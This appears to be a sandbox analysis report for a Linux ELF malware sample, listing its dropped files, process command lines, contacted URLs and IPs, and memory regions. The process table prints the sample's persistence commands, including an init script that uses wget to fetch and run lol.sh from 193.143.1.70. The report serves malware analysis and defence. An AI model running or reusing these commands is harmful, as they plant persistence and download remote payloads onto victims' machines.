Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
x86_32.nn.elf
|
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/sh
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/x86_32.nn.elf
|
/tmp/x86_32.nn.elf
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget
http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n
killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n
exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/sh /etc/rc.d/S99sh
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/tmp/x86_32.nn.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 41 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi
|
unknown
|
||
|
http://193.143.1.70/curl.sh
|
unknown
|
||
|
http://193.143.1.70/lol.sh
|
unknown
|
||
|
http://193.143.1.70/
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
200.123.238.83
|
unknown
|
unknown
|
||
|
19.46.35.40
|
unknown
|
United States
|
||
|
23.135.142.173
|
unknown
|
Reserved
|
||
|
66.243.1.117
|
unknown
|
United States
|
||
|
161.153.84.42
|
unknown
|
United States
|
||
|
157.12.245.244
|
unknown
|
Japan
|
||
|
77.162.174.112
|
unknown
|
Netherlands
|
||
|
20.124.173.238
|
unknown
|
United States
|
||
|
70.37.112.67
|
unknown
|
United States
|
||
|
148.92.47.147
|
unknown
|
United States
|
||
|
147.112.158.65
|
unknown
|
Norway
|
||
|
166.234.65.113
|
unknown
|
United States
|
||
|
205.27.2.231
|
unknown
|
United States
|
||
|
50.228.198.93
|
unknown
|
United States
|
||
|
67.152.90.117
|
unknown
|
United States
|
||
|
50.204.34.54
|
unknown
|
United States
|
||
|
97.60.140.191
|
unknown
|
United States
|
||
|
213.103.35.112
|
unknown
|
Sweden
|
||
|
189.219.90.221
|
unknown
|
Mexico
|
||
|
37.147.145.147
|
unknown
|
Russian Federation
|
||
|
19.233.83.195
|
unknown
|
United States
|
||
|
183.165.33.241
|
unknown
|
China
|
||
|
219.202.245.170
|
unknown
|
Japan
|
||
|
147.28.80.240
|
unknown
|
United States
|
||
|
86.65.138.32
|
unknown
|
France
|
||
|
104.29.231.51
|
unknown
|
United States
|
||
|
189.124.146.89
|
unknown
|
Brazil
|
||
|
194.109.177.155
|
unknown
|
Netherlands
|
||
|
77.225.207.79
|
unknown
|
Spain
|
||
|
39.80.0.152
|
unknown
|
China
|
||
|
196.31.15.192
|
unknown
|
South Africa
|
||
|
6.145.247.228
|
unknown
|
United States
|
||
|
210.230.255.194
|
unknown
|
Japan
|
||
|
153.61.205.180
|
unknown
|
United States
|
||
|
88.105.70.95
|
unknown
|
United Kingdom
|
||
|
61.161.9.12
|
unknown
|
China
|
||
|
7.167.150.75
|
unknown
|
United States
|
||
|
58.7.176.213
|
unknown
|
Australia
|
||
|
187.161.94.188
|
unknown
|
Mexico
|
||
|
135.12.183.20
|
unknown
|
Canada
|
||
|
153.241.209.94
|
unknown
|
Japan
|
||
|
120.124.55.133
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
101.121.181.165
|
unknown
|
China
|
||
|
84.78.180.51
|
unknown
|
Spain
|
||
|
148.0.80.196
|
unknown
|
Dominican Republic
|
||
|
60.100.19.10
|
unknown
|
Japan
|
||
|
191.100.232.240
|
unknown
|
Ecuador
|
||
|
51.166.99.45
|
unknown
|
United States
|
||
|
24.8.20.104
|
unknown
|
United States
|
||
|
190.10.218.4
|
unknown
|
Ecuador
|
||
|
145.115.248.231
|
unknown
|
Netherlands
|
||
|
92.11.200.147
|
unknown
|
United Kingdom
|
||
|
131.111.87.149
|
unknown
|
United Kingdom
|
||
|
203.239.73.154
|
unknown
|
Korea Republic of
|
||
|
23.211.10.190
|
unknown
|
United States
|
||
|
110.47.221.204
|
unknown
|
Korea Republic of
|
||
|
6.221.54.212
|
unknown
|
United States
|
||
|
192.119.23.7
|
unknown
|
United States
|
||
|
71.115.120.143
|
unknown
|
United States
|
||
|
83.195.96.12
|
unknown
|
France
|
||
|
45.75.108.71
|
unknown
|
Japan
|
||
|
97.211.245.248
|
unknown
|
United States
|
||
|
203.216.41.34
|
unknown
|
Japan
|
||
|
80.174.106.50
|
unknown
|
Spain
|
||
|
139.170.27.194
|
unknown
|
China
|
||
|
21.49.128.30
|
unknown
|
United States
|
||
|
18.133.145.55
|
unknown
|
United States
|
||
|
148.251.123.125
|
unknown
|
Germany
|
||
|
208.179.120.60
|
unknown
|
United States
|
||
|
169.205.179.56
|
unknown
|
United States
|
||
|
153.71.20.235
|
unknown
|
United States
|
||
|
175.247.122.208
|
unknown
|
Korea Republic of
|
||
|
139.132.41.185
|
unknown
|
Australia
|
||
|
39.220.132.249
|
unknown
|
Indonesia
|
||
|
54.189.236.73
|
unknown
|
United States
|
||
|
204.182.209.38
|
unknown
|
United States
|
||
|
29.113.247.77
|
unknown
|
United States
|
||
|
93.3.3.64
|
unknown
|
France
|
||
|
35.127.241.183
|
unknown
|
United States
|
||
|
171.78.251.129
|
unknown
|
India
|
||
|
179.67.29.127
|
unknown
|
Brazil
|
||
|
204.102.184.121
|
unknown
|
United States
|
||
|
97.34.3.173
|
unknown
|
United States
|
||
|
80.72.63.37
|
unknown
|
Liechtenstein
|
||
|
12.186.185.27
|
unknown
|
United States
|
||
|
175.119.147.144
|
unknown
|
Korea Republic of
|
||
|
26.1.75.167
|
unknown
|
United States
|
||
|
24.163.25.242
|
unknown
|
United States
|
||
|
64.52.168.148
|
unknown
|
United States
|
||
|
9.133.103.85
|
unknown
|
United States
|
||
|
217.255.6.140
|
unknown
|
Germany
|
||
|
86.205.185.49
|
unknown
|
France
|
||
|
28.117.148.102
|
unknown
|
United States
|
||
|
193.143.1.70
|
unknown
|
unknown
|
||
|
30.62.229.148
|
unknown
|
United States
|
||
|
205.132.247.166
|
unknown
|
United States
|
||
|
73.240.54.246
|
unknown
|
United States
|
||
|
184.192.99.23
|
unknown
|
United States
|
||
|
45.101.29.220
|
unknown
|
Egypt
|
||
|
87.22.244.10
|
unknown
|
Italy
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8060000
|
page execute read
|
|
||
|
8060000
|
page execute read
|
|
||
|
8061000
|
page read and write
|
|||
|
8063000
|
page read and write
|
|||
|
9204000
|
page read and write
|
|||
|
9204000
|
page read and write
|
|||
|
8063000
|
page read and write
|
|||
|
f7f8a000
|
page execute read
|
|||
|
ff923000
|
page read and write
|
|||
|
f7f8a000
|
page execute read
|
|||
|
8061000
|
page read and write
|
|||
|
9209000
|
page read and write
|
|||
|
ff923000
|
page read and write
|
There are 3 hidden memdumps, click here to show them.